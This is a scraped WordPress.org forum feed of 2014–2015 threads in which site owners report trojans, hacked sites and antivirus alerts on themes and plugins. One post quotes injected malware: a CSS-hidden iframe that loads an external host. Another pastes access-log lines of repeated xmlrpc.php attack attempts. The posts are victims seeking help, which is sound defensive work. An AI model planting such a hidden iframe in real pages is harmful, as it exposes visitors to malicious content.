Quantcast
Channel: Topic Tag: trojan | WordPress.org
Viewing all 141 articles
Browse latest View live

fredriley on "PHP.Trojan.WebShell-7 trojan hack"

May 16, 2014, 5:25 am
$
0
0

Yes, another message about a site being hacked. Before anyone copies and pastes the standard hacking articles, I have already attended to them, read the fine Wordpress Hack FAQ, installed security plugins, sacrificed chickens to the Dark One, and the rest of it.

My query here is simple: it looks like a hack of one of my sites, which redirects mobile users to a porn site, might involve the trojan "PHP.Trojan.WebShell-7", at least according to the Wordfence scan. Has anyone else suffered this hack and/or can point me towards specific information on it? In particular, how the trojan works, and what files it creates and compromises.

I am aware that I may need to rebuild the site but that would take some days which I don't have, so if I can identify compromised files then I can try to eradicate them, and if that fails I can check my latest full site backup (thanks, BackWPUp :)) for malware then restore the site from that. I don't want to have to kill then reanimate the patient for a simple infection.

I have scanned the 5 threads generated by a forum search for "PHP.Trojan.WebShell-7" and they look to have some useful advice, but as far as I can see no information specific to this Trojan. They are quite long so I've not read every single word, though I will do. Neither is Googling it much help. Pointers to information (not general articles, ta very much) would be appreciated, and I'll happily share them with friends and colleagues running WP sites. I've already advised them to install Wordfence as a precaution, which to my shame I should have done myself - I did try Bulletproof on localhost but that messes around mightily with .htacess files which made me very nervous indeed, so I gave it a miss.

Fred
http://www.fredriley.org.uk

Search

dreamee on "Security Alert on Touchfolio theme"

June 7, 2014, 2:55 am
$
0
0

This message display when I try to install the Touchfolio theme by uploading the zip file. The file is downloaded from http://dimsemenov.com/themes/touchfolio/

Security Alert
The file you are uploading was rejected by the server.
It probably contents viruses or trojans that can damage your website
Do not attempt to upload it again as your IP address may be blocked.

Anyone? Please help.

Fawk on "[Plugin: Shareaholic | share buttons, related posts, social analytics & more] how the QUACK do i remove viglink"

September 3, 2014, 9:08 am

waxxx on "Infected website ! Help guys !"

September 14, 2014, 2:48 am
$
0
0

Hi guys,

When i access my admin section after logging in, i get each time a warning from avast telling me that a file called quicktags.min.js?ver=3.8.4|{gzip} is infected by a JS:Iframe-EJR [Trj].

besides, i'm receiving an important number of people trying to access my admin section. The iThemes Security Plugin reports more than 20 to 30 tries per day.

I'm using for the login form now 2 plugins : Two factor auth and Si CAPTCHA Option.

Is there any way to replace that file?

PS : sorry for my english.

SnorkleZ on "Could this Iframe be part of a plugin trojan?"

October 19, 2014, 6:04 pm
$
0
0

After using a few new plugins my wp-config.php had ha added at the very beginning and the entire file had been written in Windows format (I had to remove all of the CR's so that BBEdit would display it correctly since I use OSX.

This is on my local server running under MAMP under my own username.

I don't really know PHP or JS well, but looked at the plugins and this caught my eye since it loads arbitrary code from an external site, and I find it odd that the file is named sidebar.php. Is there any way the loaded sidebar.php file could be made to execute arbitrary code?

<div id="postbox-container-1" class="postbox-container">
                <iframe frameBorder="0" height = "1000" src = "http://sudarmuthu.com/projects/wordpress/bulk-move/sidebar.php?color=<?php echo get_user_option( 'admin_color' ); ?>&version=<?php echo self::VERSION; ?>"></iframe>
            </div>

Any comments are greatly appreciated

dromy on "[Plugin: AntiVirus] I'm a little scared for my website..."

December 16, 2014, 11:19 pm
$
0
0

Since my plugin update I see on my statistics users from Russia, can't say for sure this is related but it surely raise a question.

Is there an information anywhere on the sites that uses this plug in? or is that the creator of the plugin checking my website?

also, can the plugin writer log to my server or website using this plugin?

https://wordpress.org/plugins/antivirus/

abehjat on "Caught Hacking File that modifies and damages WP via backdoor"

December 22, 2014, 5:40 pm
$
0
0

I recently got hacked. However, due to permission settings, somehow the hacker wasn't able to delete all his code files that injected the virus, so I had the change to read his code. I was not sure where to place this document, however, here is the full meat of the hack. I would encourage people to identify in their WordPress instance (most likely caused by a vulnerable plugin):

http://pastebin.com/KDzhivWT

rvbinder on "[Plugin: Wordfence Security] CryptoPHP Vulnerability?"

December 3, 2014, 6:10 am
Search

tommyleyland on "script and iframe virus injected above head tag"

March 25, 2015, 5:51 am
$
0
0

Hey guys,
Suddenly all of my website on the same hosting package are not letting me log in the wp-admin and I've now taken a look at one of them and none of the CSS is working. I inspected it with Chrome and it seems I've been hacked, but how is it happening on every one?

This has shown above the <head>:

<style>.i0zeuh { position:absolute; left:-1233px; top:-1187px} </style> <div class="i0zeuh"><iframe src="http://azifxum.servepics.com/blog/4c2H?utm_source=g153" width="179" height="248"></iframe></div><!DOCTYPE html>
<!DOCTYPE html>

on http://freelance.tstwebdesign.co.uk/

Does anyone know how I can remove/fix these websites? I'm desperate!

heidi22 on "[Plugin: UpdraftPlus Backup and Restoration] Trojans downloading with backups"

July 1, 2015, 12:21 pm

Maikuolan on "Upload Plugin"

July 27, 2015, 2:39 am
$
0
0

Hi,

I'm the author of a security wrapper that deals with malicious file uploads that's currently deployed to a number of different websites using a number of different CMS and I'm considering writing a Wordpress plugin version of this security wrapper, due to some Wordpress users wanting to make use of this security wrapper but with there being some concerns in regards to compatibility.

The last time that I'd actually used Wordpress would've been at least four years or so ago, it was only very briefly, and I didn't deal with any file upload features of Wordpress whatsoever; I'm not particularly knowledgeable about any of the current versions of Wordpress or their inner workings.

Creating a new topic here requires that I specify which version of Wordpress I use. I selected "4.2.3", because that's the latest version available in that list, but in actuality, I don't use Wordpress for myself at all at this time. Ideally, however, this plugin I'm wanting to write should be compatible with whatever contemporary versions of Wordpress are in current and primary use, because it is intended for wider public availability as opposed to being simply for myself.

I've briefly read what documentation I could find here on the Wordpress website in regards to developing plugins.

It's possible I may have more questions in the future, but for now, I'm hoping that someone here may be able to answer three questions in particular that I have at this time.

Firstly, it has been suggested to me that Wordpress leverages AJAX for its file upload process; Is that true?

Secondly, if the above is true, what would be the appropriate action/hook to use in order to trigger the primary function of the plugin upon a user attempting to upload a file via Wordpress?

Thirdly, and assuming again the above to be true, what response would be expected from the request and how would Wordpress handle that response?

Any help you could provide would be appreciated.

Kind regards,
Caleb M / Maikuolan.

Pixel_me on "[Theme: Virtue] Trojan on theme plugin?"

August 13, 2015, 5:23 am
$
0
0

Hi

A friend of mine (I made his website) contacted me and told me his anti-virus programma, G Data, found a virus on his website (I translated the Dutch parts):

Virus: JS:Trojan.JS.Agent.KU (Engine A)
Virus gevonden bij het inladen van internet-content. (Virus found while loading content)
Adres: http://www.wildvangpiercing.be/wp-content/themes/virtue/assets/js/min/plugins-min.js?ver=249
Status: De toegang is geweigerd. (access denied)

Avast anti-virus does not give me a warning on my pc. But when I scan in Wordpress with the plugin Anti-Malware and Brute-Force Security by ELI, it finds potential threats on:

.../wp-content/themes/virtue/assets/js/plugins.js
.../wp-content/themes/virtue/assets/js/min/plugins-min.js
.../wp-content/themes/virtue/themeoptions/options/extensions/vendor_support/vendor/ace_editor/worker-css.js
.../wp-content/themes/virtue/themeoptions/options/extensions/vendor_support/vendor/ace_editor/worker-javascript.js
.../wp-content/themes/virtue/themeoptions/options/extensions/vendor_support/vendor/ace_editor/worker-php.js

I updated the theme and did a new scan but same results.

So is this a real trojan? Or just a misinterpretation of the scanner? Or perhaps just a virus on my friends pc?

Regards

DidoH on "Remove StealRat from website"

August 27, 2015, 11:14 pm
$
0
0

Hi there,

I have discovered that my site julialloydgeorge.com has StealRat. The server has removed the site to prevent it damaging the sites of other customers. Is anyone able to help me remove this malware and suggest ways of securing my website for the future? I am pretty sure there was malicious code in the header.php.

Many thanks,
Domini

syzygist on "[Plugin: WP Backitup] blocked trojan alert followed by page not found errors when downloading"

September 6, 2015, 7:58 pm
$
0
0

I was already lukewarm about this plugin because it required me to download 6 separate backup files every time I back up, which is a hassle. Then tonight, I was able to download the first three, but as I was downloading the 4th file (themes), I received an alert from my antivirus program (Avast) that a trojan had been blocked. Then I got a "this page doesn't exist error" when I tried again to to download the themes backup file, and the other two remaining backup files.

I wasn't sure if this was related to the alert or not, but to be safe, I deleted the first three files, and started the process all over again. The backup process seemed to complete normally, but this time I wasn't able to download any of the files.

I tried it one more time in a different browser (started with FireFox, then I tried IE), with the same result. Thought I'd try support, but it's only available for premium users. That's WAY too much hassle and possible risk. Was the trojan related to the plugin? Don't know, but I can't rule it out. Uninstalled it, and do not recommend!

https://wordpress.org/plugins/wp-backitup/

markwadetaylor on "Trojan in gadgetine theme"

September 15, 2015, 4:38 am
Search

markwadetaylor on "Gadgetine theme has a trojan according to AVG"

September 15, 2015, 4:47 am

gaynor1011 on "[Plugin: Website Toolbox Forums] Widgets, Trojan, can't upgrade"

September 25, 2015, 5:54 am
$
0
0

Hi all,
Please could someone help me? I have a number of issues. I tried to go onto my website but Bitdefender said it had a trojan, so I'm trying to find out why. When I finally went onto it I found I could not upgrade to the new version of Wordpress - it tells me Could not copy file.: wp-includes/images/crystal/document.png

All my plugins and everything else are sorted.

Then I found that for some reason I can't access Widgets - it no longer appears under 'Appearance' on my dashboard. I activated a new theme to try to solve the above problem and all my widgets disappeared.

So in a nutshell, what is the trojan thing, how do I get rid of it, how do I upgrade to the new version of Wordpress and where are my widgets? My site is at http://www.popspeaking.com

Regards, Gaynor

https://wordpress.org/plugins/website-toolbox-forums/

icetek on "Crackers are using xmlrpc.php and putting a backdoor into my PHP code..."

October 11, 2015, 7:44 pm
$
0
0 
access.log.1:151.80.103.33 - - [28/Sep/2015:23:03:10 -0700] "POST /xmlrpc.php HTTP/1.1" 404 466 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0"
access.log.1:196.36.167.46 - - [28/Sep/2015:23:07:13 -0700] "POST /xmlrpc.php HTTP/1.1" 404 504 "-" "-"
access.log.1:181.174.182.153 - - [28/Sep/2015:23:07:52 -0700] "POST /xmlrpc.php HTTP/1.1" 200 629 "-" "-"
access.log.1:151.80.103.33 - - [28/Sep/2015:23:08:16 -0700] "POST /xmlrpc.php HTTP/1.1" 404 466 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0"
access.log.1:42.116.25.90 - - [28/Sep/2015:23:09:01 -0700] "POST /xmlrpc.php HTTP/1.1" 200 836 "-" "-"
access.log.1:151.80.103.33 - - [28/Sep/2015:23:13:04 -0700] "POST /xmlrpc.php HTTP/1.1" 404 466 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0"
access.log.1:180.250.89.210 - - [28/Sep/2015:23:13:46 -0700] "POST /xmlrpc.php HTTP/1.1" 200 629 "-" "-"
access.log.1:151.80.103.33 - - [28/Sep/2015:23:18:22 -0700] "POST /xmlrpc.php HTTP/1.1" 404 466 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0"
access.log.1:151.80.103.33 - - [28/Sep/2015:23:23:25 -0700] "POST /xmlrpc.php HTTP/1.1" 404 466 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0"
access.log.1:151.80.103.33 - - [28/Sep/2015:23:28:19 -0700] "POST /xmlrpc.php HTTP/1.1" 404 466 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0"
access.log.1:59.178.173.233 - - [28/Sep/2015:23:30:29 -0700] "POST /xmlrpc.php HTTP/1.1" 404 474 "-" "-"
access.log.1:151.80.103.33 - - [28/Sep/2015:23:33:15 -0700] "POST /xmlrpc.php HTTP/1.1" 404 466 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0"
access.log.1:151.80.103.33 - - [28/Sep/2015:23:38:48 -0700] "POST /xmlrpc.php HTTP/1.1" 404 466 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0"
access.log.1:151.80.103.33 - - [28/Sep/2015:23:43:56 -0700] "POST /xmlrpc.php HTTP/1.1" 404 466 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0"
access.log.1:151.80.103.33 - - [28/Sep/2015:23:48:43 -0700] "POST /xmlrpc.php HTTP/1.1" 404 466 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0"
access.log.1:151.80.103.33 - - [28/Sep/2015:23:53:38 -0700] "POST /xmlrpc.php HTTP/1.1" 404 466 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0"
access.log.1:31.11.95.223 - - [28/Sep/2015:23:54:00 -0700] "POST /xmlrpc.php HTTP/1.1" 200 629 "-" "-"
access.log.1:151.80.103.33 - - [28/Sep/2015:23:58:28 -0700] "POST /xmlrpc.php HTTP/1.1" 404 466 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0"
access.log.1:151.80.103.31 - - [29/Sep/2015:00:00:35 -0700] "POST /xmlrpc.php HTTP/1.1" 404 466 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0"
access.log.1:151.80.103.31 - - [29/Sep/2015:00:02:25 -0700] "POST /xmlrpc.php HTTP/1.1" 404 466 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0"
access.log.1:151.80.103.33 - - [29/Sep/2015:00:03:15 -0700] "POST /xmlrpc.php HTTP/1.1" 404 466 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0"
^C

This is info on the trojan they're installing. I'm trying to use stream editor or possibly awk to remove it.. I think XMLRPC is how they're getting in..
http://stackoverflow.com/questions/33072420/how-do-i-use-find-sed-i-to-remove-the-line-containing-ua-strtolower-from-p

mike11d11 on "Email worm sending through wordpress site"

October 20, 2015, 3:48 pm
$
0
0

I'm pretty new to wordpress and was looking for some assistance on how our wordpress site is getting taken advantage of by some sort of email worm or virus. We currently use Exchange for email in our environment and a 3rd party outbound filtering service so we are fortunate that this virus or worm is not getting us blacklisted. We noticed that our webserver is relaying bogus emails throughout the day, it really isnt a ton of messages, seems like only 10 a minute or so but they are bogus accounts not on our system. We eventually narrowed it down to the wordpress site and as soon as we stop the site all the emails stop. I even went in and changed the email settings within teh word press site but that doesnt have any effect on the mail going out because we allow relaying from only specific ip's and this is one. How can i trouble shoot the site itself to see which part has been compromised by this worm in order to get rid of it? any assistance is appreciated!

iamankitshah on "[Plugin: Comment Mail™ (WP Comment Subscriptions)] Virus Total Scan"

October 23, 2015, 10:37 am
Viewing all 141 articles
Browse latest View live
Search